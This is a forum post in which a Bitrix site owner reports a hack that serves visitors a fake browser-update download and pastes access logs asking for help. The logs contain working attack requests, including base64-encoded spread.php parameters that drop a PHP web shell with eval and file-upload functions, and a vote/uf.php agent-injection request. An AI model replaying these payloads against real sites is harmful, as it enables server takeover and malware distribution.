1С-Битрикс Разработчикам

Взломали сайт. Появляется "капча" с информацией, что браузер устарел, далее с нашего домена открывает страницу загрузки "новой версии". Скачивается exeшник

На сайте не были установлены самые последние обновления. Обновлялись в конце прошлого года.

Левых файлов найти так и не удалось. Созданных (или измененных) подозрительных файлов за последнее время нет. Встроенный поиск троянов ни на что такое не ругается.

В логах последнюю неделю пытались загрузить файлы с IPшника 79.137.206.177

Логи по этому IP:

Код

79.137.206.177 - - [03/Feb/2024:06:19:26 +0300 - -] 301 "GET / HTTP/1.1" 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2793.63 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:06:19:27 +0300 - 0.020] 200 "GET / HTTP/1.1" 150417 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2793.63 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:07:47:40 +0300 - -] 301 "GET / HTTP/1.1" 162 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.12 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:07:47:41 +0300 - 0.022] 200 "GET / HTTP/1.1" 150416 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.12 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:07:48:29 +0300 - 0.284] 404 "GET /bitrix/tools/spread.php?state=MD1zeXN0ZW0mMT1lY2hvIFBEOXdhSEFnWldOb2J5QTBNRGszTWpNcU1qQTdhV1lvYldRMUtDUmZRMDlQUzBsRlcyUmRLVDA5SWpFM01ESTRaalE0TjJOaU1tRTRORFl3TnpZME5tUmhNMkZrTXpnM09HVmpJaWw3WldOb2J5SnZheUk3WlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NSZlVrVlJWVVZUVkZ0cFpGMHBLVHRwWmlna1gxQlBVMVJiSW5Wd0lsMDlQU0oxY0NJcGUwQmpiM0I1S0NSZlJrbE1SVk5iSW1acGJHVWlYVnNpZEcxd1gyNWhiV1VpWFN3a1gwWkpURVZUV3lKbWFXeGxJbDFiSW01aGJXVWlYU2s3ZlgwL1BnPT18YmFzZTY0IC1kfCB0ZWUgLi4vLi4vZjE5NWJmMjVjM2IwLnBocCYyPQ== HTTP/1.1" 151082 "https://***.ru/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.12 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:07:48:30 +0300 - 0.246] 404 "GET /f195bf25c3b0.php HTTP/1.1" 149781 "https://***.ru/bitrix/tools/spread.php?state=MD1zeXN0ZW0mMT1lY2hvIFBEOXdhSEFnWldOb2J5QTBNRGszTWpNcU1qQTdhV1lvYldRMUtDUmZRMDlQUzBsRlcyUmRLVDA5SWpFM01ESTRaalE0TjJOaU1tRTRORFl3TnpZME5tUmhNMkZrTXpnM09HVmpJaWw3WldOb2J5SnZheUk3WlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NSZlVrVlJWVVZUVkZ0cFpGMHBLVHRwWmlna1gxQlBVMVJiSW5Wd0lsMDlQU0oxY0NJcGUwQmpiM0I1S0NSZlJrbE1SVk5iSW1acGJHVWlYVnNpZEcxd1gyNWhiV1VpWFN3a1gwWkpURVZUV3lKbWFXeGxJbDFiSW01aGJXVWlYU2s3ZlgwL1BnPT18YmFzZTY0IC1kfCB0ZWUgLi4vLi4vZjE5NWJmMjVjM2IwLnBocCYyPQ==" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.12 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:07:48:52 +0300 - 0.215] 404 "GET /bitrix/tools/spread.php?state=MD1maWxlX3B1dF9jb250ZW50cyYxPS4uLy4uL2YxOTViZjI1YzNiMC5waHAmMj08P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbZF0pPT0iMTcwMjhmNDg3Y2IyYTg0NjA3NjQ2ZGEzYWQzODc4ZWMiKXtlY2hvIm9rIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUW2lkXSkpO2lmKCRfUE9TVFsidXAiXT09InVwIil7QGNvcHkoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLCRfRklMRVNbImZpbGUiXVsibmFtZSJdKTt9fT8+ HTTP/1.1" 150741 "https://***.ru/f195bf25c3b0.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.12 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:07:48:53 +0300 - 0.216] 404 "GET /f195bf25c3b0.php HTTP/1.1" 149780 "https://***.ru/bitrix/tools/spread.php?state=MD1maWxlX3B1dF9jb250ZW50cyYxPS4uLy4uL2YxOTViZjI1YzNiMC5waHAmMj08P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbZF0pPT0iMTcwMjhmNDg3Y2IyYTg0NjA3NjQ2ZGEzYWQzODc4ZWMiKXtlY2hvIm9rIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUW2lkXSkpO2lmKCRfUE9TVFsidXAiXT09InVwIil7QGNvcHkoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLCRfRklMRVNbImZpbGUiXVsibmFtZSJdKTt9fT8+" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.12 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:18:56:44 +0300 - -] 301 "GET / HTTP/1.1" 162 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2944.93 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:18:56:45 +0300 - 0.020] 200 "GET / HTTP/1.1" 150559 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2944.93 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:18:56:52 +0300 - 0.253] 404 "GET /f195bf25c3b0.php HTTP/1.1" 149891 "https://***.ru/" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2944.93 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:18:56:53 +0300 - 0.030] 200 "GET /bitrix/tools/composite_data.php HTTP/1.1" 238 "https://***.ru/f195bf25c3b0.php" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2944.93 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:18:56:53 +0300 - 0.239] 404 "POST /bitrix/tools/vote/uf.php?attachId[ENTITY_TYPE]=CFileUploader&attachId[ENTITY_ID][events][onFileIsStarted][]=CAllAgent&attachId[ENTITY_ID][events][onFileIsStarted][]=Update&attachId[MODULE_ID]=vote&action=vote HTTP/1.1" 150270 "https://***.ru/bitrix/tools/composite_data.php" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2944.93 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:23:19:37 +0300 - -] 301 "GET /bitrix/admin/index.php?login=yes HTTP/1.1" 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:46.0) Gecko/20100101 Firefox/46.0" "-"
79.137.206.177 - - [03/Feb/2024:23:19:37 +0300 - 0.106] 200 "GET /bitrix/admin/index.php?login=yes HTTP/1.1" 6489 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:46.0) Gecko/20100101 Firefox/46.0" "-"
79.137.206.177 - - [03/Feb/2024:23:19:47 +0300 - 0.054] 200 "POST /bitrix/admin/index.php?login=yes HTTP/1.1" 220 "https://***.ru/bitrix/admin/index.php?login=yes" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:46.0) Gecko/20100101 Firefox/46.0" "-"
79.137.206.177 - - [04/Feb/2024:04:02:10 +0300 - -] 301 "GET / HTTP/1.1" 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2841.34 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:04:02:10 +0300 - 0.020] 200 "GET / HTTP/1.1" 150416 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2841.34 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:05:08:30 +0300 - -] 301 "GET / HTTP/1.1" 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:05:08:31 +0300 - 0.019] 200 "GET / HTTP/1.1" 150416 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:05:08:35 +0300 - 0.043] 200 "GET /bitrix/tools/composite_data.php HTTP/1.1" 238 "https://***.ru/" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:05:08:35 +0300 - 0.049] 200 "POST /bitrix/tools/html_editor_action.php HTTP/1.1" 0 "https://***.ru/bitrix/tools/composite_data.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:05:08:38 +0300 - 0.034] 200 "POST /bitrix/tools/html_editor_action.php HTTP/1.1" 0 "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:05:08:42 +0300 - 0.039] 200 "POST /bitrix/tools/html_editor_action.php HTTP/1.1" 0 "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:05:08:42 +0300 - 0.020] 200 "GET / HTTP/1.1" 150424 "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:05:08:43 +0300 - 0.319] 404 "POST /bitrix/tools/accesson.php HTTP/1.1" 149659 "https://***.ru/" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:05:08:43 +0300 - 0.204] 404 "POST /bitrix/tools/f195bf25c3b0.php HTTP/1.1" 149678 "https://***.ru/bitrix/tools/accesson.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:15:20:49 +0300 - -] 301 "GET / HTTP/1.1" 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0" "-"
79.137.206.177 - - [04/Feb/2024:15:20:49 +0300 - 0.019] 200 "GET / HTTP/1.1" 150654 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0" "-"
79.137.206.177 - - [04/Feb/2024:15:21:45 +0300 - 0.296] 404 "GET /bitrix/tools/spread.php?state=MD1zeXN0ZW0mMT1lY2hvIFBEOXdhSEFnWldOb2J5QTBNRGszTWpNcU1qQTdhV1lvYldRMUtDUmZRMDlQUzBsRlcyUmRLVDA5SWpFM01ESTRaalE0TjJOaU1tRTRORFl3TnpZME5tUmhNMkZrTXpnM09HVmpJaWw3WldOb2J5SnZheUk3WlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NSZlVrVlJWVVZUVkZ0cFpGMHBLVHRwWmlna1gxQlBVMVJiSW5Wd0lsMDlQU0oxY0NJcGUwQmpiM0I1S0NSZlJrbE1SVk5iSW1acGJHVWlYVnNpZEcxd1gyNWhiV1VpWFN3a1gwWkpURVZUV3lKbWFXeGxJbDFiSW01aGJXVWlYU2s3ZlgwL1BnPT18YmFzZTY0IC1kfCB0ZWUgLi4vLi4vZjE5NWJmMjVjM2IwLnBocCYyPQ== HTTP/1.1" 151081 "https://***.ru/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0" "-"
9.137.206.177 - - [04/Feb/2024:15:21:46 +0300 - 0.248] 404 "GET /f195bf25c3b0.php HTTP/1.1" 149784 "https://***.ru/bitrix/tools/spread.php?state=MD1zeXN0ZW0mMT1lY2hvIFBEOXdhSEFnWldOb2J5QTBNRGszTWpNcU1qQTdhV1lvYldRMUtDUmZRMDlQUzBsRlcyUmRLVDA5SWpFM01ESTRaalE0TjJOaU1tRTRORFl3TnpZME5tUmhNMkZrTXpnM09HVmpJaWw3WldOb2J5SnZheUk3WlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NSZlVrVlJWVVZUVkZ0cFpGMHBLVHRwWmlna1gxQlBVMVJiSW5Wd0lsMDlQU0oxY0NJcGUwQmpiM0I1S0NSZlJrbE1SVk5iSW1acGJHVWlYVnNpZEcxd1gyNWhiV1VpWFN3a1gwWkpURVZUV3lKbWFXeGxJbDFiSW01aGJXVWlYU2s3ZlgwL1BnPT18YmFzZTY0IC1kfCB0ZWUgLi4vLi4vZjE5NWJmMjVjM2IwLnBocCYyPQ==" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0" "-"
79.137.206.177 - - [04/Feb/2024:15:21:47 +0300 - 0.227] 404 "GET /bitrix/tools/spread.php?state=MD1maWxlX3B1dF9jb250ZW50cyYxPS4uLy4uL2YxOTViZjI1YzNiMC5waHAmMj08P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbZF0pPT0iMTcwMjhmNDg3Y2IyYTg0NjA3NjQ2ZGEzYWQzODc4ZWMiKXtlY2hvIm9rIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUW2lkXSkpO2lmKCRfUE9TVFsidXAiXT09InVwIil7QGNvcHkoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLCRfRklMRVNbImZpbGUiXVsibmFtZSJdKTt9fT8+ HTTP/1.1" 150751 "https://***.ru/f195bf25c3b0.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0" "-"
79.137.206.177 - - [04/Feb/2024:15:21:47 +0300 - 0.223] 404 "GET /f195bf25c3b0.php HTTP/1.1" 149784 "https://***.ru/bitrix/tools/spread.php?state=MD1maWxlX3B1dF9jb250ZW50cyYxPS4uLy4uL2YxOTViZjI1YzNiMC5waHAmMj08P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbZF0pPT0iMTcwMjhmNDg3Y2IyYTg0NjA3NjQ2ZGEzYWQzODc4ZWMiKXtlY2hvIm9rIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUW2lkXSkpO2lmKCRfUE9TVFsidXAiXT09InVwIil7QGNvcHkoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLCRfRklMRVNbImZpbGUiXVsibmFtZSJdKTt9fT8+" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0" "-"
79.137.206.177 - - [05/Feb/2024:01:57:18 +0300 - -] 301 "GET / HTTP/1.1" 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Win64; x64; Trident/6.0)" "-"
79.137.206.177 - - [05/Feb/2024:01:57:18 +0300 - 0.018] 200 "GET / HTTP/1.1" 151283 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Win64; x64; Trident/6.0)" "-"

Все логи с 28 числа, которые нашел:

Код

127.0.0.1 - - [28/Jan/2024:11:45:07 +0300] "POST /bitrix/tools/f195bf25c3b0.php HTTP/1.0" 404 1280668 "https://***.ru/bitrix/tools/accesson.php" "Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2649.67 Safari/537.36"
127.0.0.1 - - [28/Jan/2024:12:05:43 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/composite_data.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2914.96 Safari/537.36"
127.0.0.1 - - [28/Jan/2024:12:05:43 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2914.96 Safari/537.36"
127.0.0.1 - - [28/Jan/2024:12:05:43 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2914.96 Safari/537.36"
127.0.0.1 - - [28/Jan/2024:12:05:43 +0300] "GET / HTTP/1.0" 200 1291401 "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2914.96 Safari/537.36"
127.0.0.1 - - [28/Jan/2024:12:05:44 +0300] "POST /accesson.php HTTP/1.0" 404 1280775 "https://***.ru/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2914.96 Safari/537.36"
127.0.0.1 - - [28/Jan/2024:12:05:44 +0300] "POST /f195bf25c3b0.php HTTP/1.0" 404 1280807 "https://***.ru/accesson.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2914.96 Safari/537.36"
127.0.0.1 - - [29/Jan/2024:02:15:50 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281052 "https://***.ru/bitrix/tools/spread.php?state=MD1zeXN0ZW0mMT1lY2hvIFBEOXdhSEFnWldOb2J5QTBNRGszTWpNcU1qQTdhV1lvYldRMUtDUmZRMDlQUzBsRlcyUmRLVDA5SWpFM01ESTRaalE0TjJOaU1tRTRORFl3TnpZME5tUmhNMkZrTXpnM09HVmpJaWw3WldOb2J5SnZheUk3WlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NSZlVrVlJWVVZUVkZ0cFpGMHBLVHRwWmlna1gxQlBVMVJiSW5Wd0lsMDlQU0oxY0NJcGUwQmpiM0I1S0NSZlJrbE1SVk5iSW1acGJHVWlYVnNpZEcxd1gyNWhiV1VpWFN3a1gwWkpURVZUV3lKbWFXeGxJbDFiSW01aGJXVWlYU2s3ZlgwL1BnPT18YmFzZTY0IC1kfCB0ZWUgLi4vLi4vZjE5NWJmMjVjM2IwLnBocCYyPQ==" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [29/Jan/2024:02:15:51 +0300] "GET /bitrix/tools/spread.php?state=MD1maWxlX3B1dF9jb250ZW50cyYxPS4uLy4uL2YxOTViZjI1YzNiMC5waHAmMj08P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbZF0pPT0iMTcwMjhmNDg3Y2IyYTg0NjA3NjQ2ZGEzYWQzODc4ZWMiKXtlY2hvIm9rIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUW2lkXSkpO2lmKCRfUE9TVFsidXAiXT09InVwIil7QGNvcHkoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLCRfRklMRVNbImZpbGUiXVsibmFtZSJdKTt9fT8+ HTTP/1.0" 404 1283509 "https://***.ru/f195bf25c3b0.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [29/Jan/2024:02:15:53 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281052 "https://***.ru/bitrix/tools/spread.php?state=MD1maWxlX3B1dF9jb250ZW50cyYxPS4uLy4uL2YxOTViZjI1YzNiMC5waHAmMj08P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbZF0pPT0iMTcwMjhmNDg3Y2IyYTg0NjA3NjQ2ZGEzYWQzODc4ZWMiKXtlY2hvIm9rIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUW2lkXSkpO2lmKCRfUE9TVFsidXAiXT09InVwIil7QGNvcHkoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLCRfRklMRVNbImZpbGUiXVsibmFtZSJdKTt9fT8+" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [29/Jan/2024:10:31:17 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281053 "https://***.ru/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.79 Safari/537.36"
127.0.0.1 - - [29/Jan/2024:10:31:18 +0300] "POST / HTTP/1.0" 200 1300411 "https://***.ru/f195bf25c3b0.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.79 Safari/537.36"
127.0.0.1 - - [29/Jan/2024:10:31:19 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281053 "https://***.ru/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.79 Safari/537.36"
127.0.0.1 - - [29/Jan/2024:14:26:29 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281053 "https://***.ru/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
127.0.0.1 - - [29/Jan/2024:14:26:29 +0300] "GET /bitrix/tools/composite_data.php HTTP/1.0" 200 317 "https://***.ru/f195bf25c3b0.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
127.0.0.1 - - [29/Jan/2024:14:26:30 +0300] "POST /bitrix/tools/vote/uf.php?attachId[ENTITY_TYPE]=CFileUploader&attachId[ENTITY_ID][events][onFileIsStarted][]=CAllAgent&attachId[ENTITY_ID][events][onFileIsStarted][]=Update&attachId[MODULE_ID]=vote&action=vote HTTP/1.0" 404 1282343 "https://***.ru/bitrix/tools/composite_data.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
127.0.0.1 - - [29/Jan/2024:20:07:33 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/composite_data.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
127.0.0.1 - - [29/Jan/2024:20:07:33 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
127.0.0.1 - - [29/Jan/2024:20:07:34 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
127.0.0.1 - - [29/Jan/2024:20:07:34 +0300] "POST /bitrix/tools/accesson.php HTTP/1.0" 404 1280636 "https://***.ru/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
127.0.0.1 - - [29/Jan/2024:20:07:36 +0300] "POST /bitrix/tools/f195bf25c3b0.php HTTP/1.0" 404 1280668 "https://***.ru/bitrix/tools/accesson.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
127.0.0.1 - - [29/Jan/2024:21:03:53 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2802.54 Safari/537.36"
127.0.0.1 - - [29/Jan/2024:21:03:54 +0300] "GET / HTTP/1.0" 200 1291394 "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2802.54 Safari/537.36"
127.0.0.1 - - [29/Jan/2024:21:03:54 +0300] "POST /accesson.php HTTP/1.0" 404 1280774 "https://***.ru/" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2802.54 Safari/537.36"
127.0.0.1 - - [29/Jan/2024:21:03:55 +0300] "POST /f195bf25c3b0.php HTTP/1.0" 404 1280806 "https://***.ru/accesson.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2802.54 
127.0.0.1 - - [31/Jan/2024:17:55:48 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281052 "https://***.ru/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [31/Jan/2024:17:56:05 +0300] "POST / HTTP/1.0" 200 1300410 "https://***.ru/f195bf25c3b0.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [31/Jan/2024:17:56:14 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281052 "https://***.ru/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [01/Feb/2024:08:49:01 +0300] "GET / HTTP/1.0" 200 1291258 "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [01/Feb/2024:08:49:01 +0300] "POST /bitrix/tools/accesson.php HTTP/1.0" 404 1281313 "https://***.ru/" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [01/Feb/2024:08:49:02 +0300] "POST /bitrix/tools/f195bf25c3b0.php HTTP/1.0" 404 1281345 "https://***.ru/bitrix/tools/accesson.php" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [01/Feb/2024:09:21:18 +0300] "GET / HTTP/1.0" 200 1291305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [01/Feb/2024:09:21:20 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/composite_data.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [01/Feb/2024:09:21:21 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [01/Feb/2024:09:21:21 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 
127.0.0.1 - - [01/Feb/2024:09:21:24 +0300] "POST /f195bf25c3b0.php HTTP/1.0" 404 1280810 "https://***.ru/accesson.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [02/Feb/2024:01:03:57 +0300] "GET / HTTP/1.0" 200 1290586 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
